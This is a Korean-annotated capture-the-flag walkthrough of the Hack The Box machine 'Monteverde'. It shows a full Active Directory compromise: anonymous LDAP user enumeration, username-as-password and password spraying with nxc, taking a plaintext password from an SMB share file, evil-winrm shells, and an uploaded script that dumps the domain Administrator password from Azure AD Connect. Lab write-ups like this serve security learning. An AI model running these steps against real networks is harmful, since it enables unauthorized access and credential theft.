Proof of Concept
10.129.228.111
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanInformation Gathering
hosts 정보 수집
┌──(kali㉿kali)-[~/Monteverde]
└─$ nxc smb 10.129.228.111 --generate-hosts-file hosts
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Monteverde]
└─$ cat hosts
10.129.228.111 MONTEVERDE.MEGABANK.LOCAL MEGABANK.LOCAL MONTEVERDE/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Monteverde]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.228.111 MONTEVERDE.MEGABANK.LOCAL MEGABANK.LOCAL MONTEVERDEInitial Access
LDAP 정보 수집
┌──(kali㉿kali)-[~/Monteverde]
└─$ ldapsearch -x -H ldap://10.129.228.111 -D '' -w '' -b "DC=megabank,DC=local" | tee ldapsearch.txt
# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# MEGABANK.LOCAL
dn: DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=MEGABANK,DC=LOCAL
instanceType: 5
whenCreated: 20200102220515.0Z
whenChanged: 20260225155116.0Z
subRefs: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
subRefs: CN=Configuration,DC=MEGABANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAD3ugOsMvMU+GSt3sotNcxQ==
uSNChanged: 86045
name: MEGABANK
objectGUID:: dF0ZQW9mmEa6eGdQmEH00A==
replUpToDateVector:: AgAAAAAAAAAMAAAAAAAAAA97oDrDLzFPhkrd7KLTXMUFcAAAAAAAAHgMH
xQDAAAAMCP1QyWOxky/S2wa0HOpshEwAQAAAAAAoMdqGQMAAAAzoIRIq+qDRLLxCfbvMI54CsAAAA
AAAACx8x8UAwAAAExFNFUyQyFDqQvprs9VhhwM4AAAAAAAABXNIxQDAAAAZVMyWFKpXEGtcEbUU+/
qWAmwAAAAAAAAB+cfFAMAAABe/et2H9WaTI5xKaaHW43LDgABAAAAAABNzrIWAwAAAJ9Lao0nTq9D
t7X7so4ZPEcSQAEAAAAAACHMahkDAAAAhz8WkG49/0eslA/vS3oKjgeQAAAAAAAA5BYfFAMAAAAPn
/fkzuNaRKsJOojPyQTJBoAAAAAAAAA5Ex8UAwAAAKdfSfADqmJLvDeHFzYjcqcL0AAAAAAAALqZIx
QDAAAAy1EB9fqh3UWLDgubthgcoxNQAQAAAAAAcquvHwMAAABJQsP4aAdBT44BY+zshDghDxABAAA
AAABjPWgZAwAAAA==
creationTime: 134165082761555509
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
<SNIP>수집한 LDAP 정보에서 사용자 이름만 필터링해서 userlist.txt 파일 생성
┌──(kali㉿kali)-[~/Monteverde]
└─$ cat ldapsearch.txt | grep "dn: CN=" | cut -d '=' -f 2 | cut -d ',' -f1 | uniq > userlist.txt사용자 이름과 비밀번호가 같은 계정 탐색 결과 “SABatchJobs:SABatchJobs”로 인증 성공
- SABatchJobs:SABatchJobs
┌──(kali㉿kali)-[~/Monteverde]
└─$ nxc smb megabank.local -u userlist.txt -p userlist.txt -t 100 --no-bruteforce
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Users:Users STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Computers:Computers STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\System:System STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\LostAndFound:LostAndFound STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Infrastructure:Infrastructure STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\ForeignSecurityPrincipals:ForeignSecurityPrincipals STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Program Data:Program Data STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Microsoft:Microsoft STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\NTDS Quotas:NTDS Quotas STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\DFSR-GlobalSettings:DFSR-GlobalSettings STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Domain System Volume:Domain System Volume STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Content:Content STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\SYSVOL Share:SYSVOL Share STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Topology:Topology STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\MONTEVERDE:MONTEVERDE STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\DFSR-LocalSettings:DFSR-LocalSettings STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Domain System Volume:Domain System Volume STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\SYSVOL Subscription:SYSVOL Subscription STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\SQLServer2005SQLBrowserUser$MONTEVERDE:SQLServer2005SQLBrowserUser$MONTEVERDE STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\ADSyncAdmins:ADSyncAdmins STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\ADSyncOperators:ADSyncOperators STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\ADSyncBrowse:ADSyncBrowse STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\ADSyncPasswordSet:ADSyncPasswordSet STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\BCKUPKEY_PREFERRED Secret:BCKUPKEY_PREFERRED Secret STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Mike Hope:Mike Hope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Azure Admins:Azure Admins STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobsSABatchJobs 사용자 azure_uploads, users$ SMB 공유 디렉토리 접근 권한 보유
┌──(kali㉿kali)-[~/Monteverde]
└─$ nxc smb megabank.local -u 'SABatchJobs' -p 'SABatchJobs' --shares
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.129.228.111 445 MONTEVERDE [*] Enumerated shares
SMB 10.129.228.111 445 MONTEVERDE Share Permissions Remark
SMB 10.129.228.111 445 MONTEVERDE ----- ----------- ------
SMB 10.129.228.111 445 MONTEVERDE ADMIN$ Remote Admin
SMB 10.129.228.111 445 MONTEVERDE azure_uploads READ
SMB 10.129.228.111 445 MONTEVERDE C$ Default share
SMB 10.129.228.111 445 MONTEVERDE E$ Default share
SMB 10.129.228.111 445 MONTEVERDE IPC$ READ Remote IPC
SMB 10.129.228.111 445 MONTEVERDE NETLOGON READ Logon server share
SMB 10.129.228.111 445 MONTEVERDE SYSVOL READ Logon server share
SMB 10.129.228.111 445 MONTEVERDE users$ READusers$ 공유 디렉토리에서 azure.xml 파일 획득
┌──(kali㉿kali)-[~/Monteverde]
└─$ smbclient //megabank.local/users$/ -U 'SABatchJobs%SABatchJobs'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020
31999 blocks of size 4096. 28979 blocks available
smb: \> cd mhope
smb: \mhope\> dir
. D 0 Fri Jan 3 08:41:18 2020
.. D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020
31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)azure.xml 파일에서 비밀번호 발견
- 4n0therD4y@n0th3r$
┌──(kali㉿kali)-[~/Monteverde]
└─$ cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>Password Spray 수행 결과 mhope 사용자로 인증 성공
- mhope:4n0therD4y@n0th3r$
┌──(kali㉿kali)-[~/Monteverde]
└─$ nxc smb megabank.local -u userlist.txt -p '4n0therD4y@n0th3r$'
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Administrator:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\krbtgt:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$mhope 사용자로 WinRM 접속
┌──(kali㉿kali)-[~/Monteverde]
└─$ evil-winrm -i megabank.local -u mhope -p '4n0therD4y@n0th3r$'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
3481facd172969fde97cea582d91576b
*Evil-WinRM* PS C:\Users\mhope\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::131
IPv6 Address. . . . . . . . . . . : dead:beef::5450:6b3c:fdbd:807a
Link-local IPv6 Address . . . . . : fe80::5450:6b3c:fdbd:807a%7
IPv4 Address. . . . . . . . . . . : 10.129.228.111
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%7
10.129.0.1Privilege Escalation
mhope 사용자가 “Azure Admins” 그룹에 속한 것을 확인
*Evil-WinRM* PS C:\Users\mhope\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
<SNIP>Azure AD Connect 동기화 구성에서 자격 증명을 추출하고 복호화하는 스크립트 파일을 타겟 머신에 업로드
*Evil-WinRM* PS C:\Users\mhope\Documents> upload decrypt.ps1
Info: Uploading /home/kali/Monteverde/decrypt.ps1 to C:\Users\mhope\Documents\decrypt.ps1
Data: 6288 bytes of 6288 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Documents> dir
Directory: C:\Users\mhope\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/25/2026 8:49 AM 4718 decrypt.ps1스크립트 실행하여 Administrator 계정 비밀번호 획득
- d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Documents> .\decrypt.ps1
Attempting connection: Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync;Integrated Security=True
Error connecting to SQL database. Trying next...
Exception Message: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 52 - Unable to locate a Local Database Runtime installation. Verify that SQL Server Express is properly installed and that the Local Database Runtime feature is enabled.)
Attempting connection: Data Source=localhost;Initial Catalog=ADSync;Integrated Security=True
Connection successful!
Loading mcrypt.dll from: C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!Administrator 계정으로 WinRM 접속
┌──(kali㉿kali)-[~/Monteverde/Azure-AD-Connect-Credential-Extractor]
└─$ evil-winrm -i megabank.local -u 'administrator' -p 'd0m@in4dminyeah!'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read root.txt
4dee1eeb5cd6108f5601823b3e55788e
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::131
IPv6 Address. . . . . . . . . . . : dead:beef::5450:6b3c:fdbd:807a
Link-local IPv6 Address . . . . . : fe80::5450:6b3c:fdbd:807a%7
IPv4 Address. . . . . . . . . . . : 10.129.228.111
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%7
10.129.0.1